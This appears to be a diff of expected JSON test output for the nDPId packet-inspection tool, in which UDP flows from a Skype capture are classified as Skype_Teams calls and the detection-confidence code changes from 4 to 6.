00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_packet_id":1,"flow_last_seen":1431970644777,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970644777,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+iz0AAEARV8bAqAEinTc4qjLdnE8AKqlOercCgeG1zG2vbzPj0KjKJlzB46QihppHpHZWBMh9hdX\/8Q=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":517,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970644777,"flow_last_seen":1431970644777,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970644777,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.56.170","src_port":13021,"dst_port":40015,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA533AAAEARH43AqAEib91KDzLdnFoAJRqBerkCLcYyzYQBZ1UUv9afmdL8U47Y0EMKk9GOcm8="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":518,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.15","src_port":13021,"dst_port":40026,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA8IE0AAEAReEHAqAEiQTffITLdnEIAKKkPersC6xhZmoz4NcwgQN8Oq77mdsG6aJAJEzSI01rU6ec="} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":519,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.33","src_port":13021,"dst_port":40002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7MzsAAEARLhjAqAEiQAQXkTLdnFsAJ6Pner0C2KbUw2DxbMk3cWJigGAv5JrHPRhWYHrZrKFH\/Q=="} -00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00669{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":520,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.145","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00492{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA+dlAAAEARIrjAqAEinTeCpTLdnFwAKmyyer8CyymJmKIvjgybbxj4QUGrEeWW\/O+vVrSV+3Rj4Yjh8w=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":521,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.165","src_port":13021,"dst_port":40028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1431970645790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":72,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":72,"pkt_l4_len":38,"thread_ts_msec":1431970645790,"pkt":"0NQSxnP1PBXCt3IOCABFAAA6yaYAAEARHe\/AqAEinTg0GzLdnFkAJhz6esECVdgpKZUPSYYd3u6m4rCVVtMoL0MGJKJcpPJg"} -00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00670{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":522,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970645790,"flow_last_seen":1431970645790,"flow_idle_time":200000,"flow_min_l4_payload_len":30,"flow_max_l4_payload_len":30,"flow_tot_l4_payload_len":30,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1431970645790,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.27","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":73,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":73,"pkt_l4_len":39,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA7AJsAAEAR\/k3AqAEib91KIjLdnFsAJ+15esMC4VlNRvu3By\/5s5rGR+P6LgoKPKR7nd4t4OfW1A=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":543,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":31,"flow_tot_l4_payload_len":31,"flow_avg_l4_payload_len":31,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.34","src_port":13021,"dst_port":40027,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA\/TKMAAEAR42DAqAEinTfrqDLdnFgAKzONesUCSrWxfzMM\/u+ve5H0njBV7f1MGIL\/NDrkYJJdktuSF9Y="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":544,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.168","src_port":13021,"dst_port":40024,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5mqYAAEARlXzAqAEinTfrjzLdnF4AJa4yescCvwHYJJA0SDNaHmIGriSDO5fklPid0RnUmyQ="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":545,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":41,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1cmsAAEARiRbAqAEib91NjzLdnFYAIbzweskC5JgrRdKtWjAuXzT2S5r85LjjhllfqQ=="} -00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00672{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.77.143","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_packet_id":1,"flow_last_seen":1431970646799,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431970646799,"pkt":"0NQSxnP1PBXCt3IOCABFAAA42pAAAEARJFHAqAEib91KLDLdnFMAJIhoessC81Jpsjijfp0Q\/Q0jMgS+1lTSx5HXr8lZjQ=="} -00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00671{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"skype_no_unknown.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431970646799,"flow_last_seen":1431970646799,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431970646799,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"111.221.74.44","src_port":13021,"dst_port":40019,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 